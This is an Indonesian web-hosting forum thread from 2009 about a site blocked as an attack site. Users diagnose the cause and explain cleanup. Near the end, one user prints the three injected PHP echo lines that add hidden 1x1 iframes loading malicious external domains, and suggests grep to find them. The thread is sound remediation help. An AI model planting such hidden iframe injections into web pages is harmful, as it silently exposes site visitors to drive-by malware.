Web Client kena Reported Attack site!


Status
Not open for further replies.

Mahavikri

Apprentice 1.0
nanya lage...

Reported Attack Site!

This web site at karawang.info has been reported as an attack site and has been blocked based on your security preferences.

Attack sites try to install programs that steal private information, use your computer to attack others, or damage your system.

Some attack sites intentionally distribute harmful software, but many are compromised without the knowledge or permission of their owners.
domain: http://karawang.info/

kira-kira kenapa yah? cara biar normal kembali gimana tuh?

udah coba di scan pake clamav ga kena virus sih:
----------- SCAN SUMMARY -----------
Known viruses: 545705
Engine version: 0.95.1-broken-compiler
Scanned directories: 471
Scanned files: 5958
Infected files: 0
Data scanned: 365.38 MB
Data read: 168.02 MB (ratio 2.17:1)
Time: 211.309 sec (3 m 31 s)
:confused: :confused:
 

ruangweb

(Ret) Community Leader
Ini pesan yg nongol kalo di-klik tombol "Why was this site blocked?" pd firefox (url http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://karawang.info/ )
Safe Browsing
Diagnostic page for karawang.info

What is the current listing status for karawang.info?

Site is listed as suspicious - visiting this web site may harm your computer.

Part of this site was listed for suspicious activity 1 time(s) over the past 90 days.

What happened when Google visited this site?

Of the 695 pages we tested on the site over the past 90 days, 42 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-04-23, and the last time suspicious content was found on this site was on 2009-04-23.

Malicious software includes 1250 scripting exploit(s). Successful infection resulted in an average of 1 new process(es) on the target machine.

Malicious software is hosted on 1 domain(s), including goooogleadsence.biz/.

This site was hosted on 4 network(s) including AS46475, AS30496 (COLO4), AS25653 (FORTRESSITX).

Has this site acted as an intermediary resulting in further distribution of malware?

Over the past 90 days, karawang.info did not appear to function as an intermediary for the infection of any sites.

Has this site hosted malware?

No, this site has not hosted malicious software over the past 90 days.

How did this happen?

In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.

Next steps:

* Return to the previous page.
* If you are the owner of this web site, you can request a review of your site using Google Webmaster Tools. More information about the review process is available in Google's Webmaster Help Center.
 

Bforce

Hosting Guru
Situs tsb mengandung 2 domain yg telah di-ban, di 3 iframe hasil injeksi (di footer):
internetcountercheck[dot]com
goooogleadsence[dot]biz

Domain Name: INTERNETCOUNTERCHECK[dot]COM
Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Name Server: NS1.SUSPENDED-DOMAIN.COM
Name Server: NS2.SUSPENDED-DOMAIN.COM

Domain Name: GOOOOGLEADSENCE[dot]BIZ
Domain ID: D29931447-BIZ
Sponsoring Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Name Server: NS1.SUSPENDED-DOMAIN.COM
Name Server: NS2.SUSPENDED-DOMAIN.COM
 

Mahavikri

Apprentice 1.0
Situs tsb mengandung 2 domain yg telah di-ban, di 3 iframe hasil injeksi (di footer):
internetcountercheck[dot]com
goooogleadsence[dot]biz

Domain Name: INTERNETCOUNTERCHECK[dot]COM
Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Name Server: NS1.SUSPENDED-DOMAIN.COM
Name Server: NS2.SUSPENDED-DOMAIN.COM

Domain Name: GOOOOGLEADSENCE[dot]BIZ
Domain ID: D29931447-BIZ
Sponsoring Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Name Server: NS1.SUSPENDED-DOMAIN.COM
Name Server: NS2.SUSPENDED-DOMAIN.COM
iya ketemu nih di file index.php bagian bawah mulai pake echo" ....
tapi kok masih muncul bos... :confused:
 

ruangweb

(Ret) Community Leader

am3n

Apprentice 1.0
Makasih Ruangweb atas petunjuk, maaf kecapekan habis hapus 3 baris ini secara manual di banyak file

Code:
echo "<iframe src=\"http://thedeadpit.com/?click=5187687\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

echo "<iframe src=\"http://internetcountercheck.com/?click=5988250\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

echo "<iframe src=\"http://goooogleadsence.biz/?click=19CD29\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
btw Mahavikri, coba deh cari nya pake command ini

Code:
grep -R goooogleadsence * > infected
di folder public_html, trus lihat file infected. karena disitus ini, 3 baris itu nempel dibanyak file :(

yang bikin aneh adalah bagaimana caranya bisa banyak file di tempelin 3 baris code tsb, pdhal file itu tidak world-writeable loh.
 
Status
Not open for further replies.

Top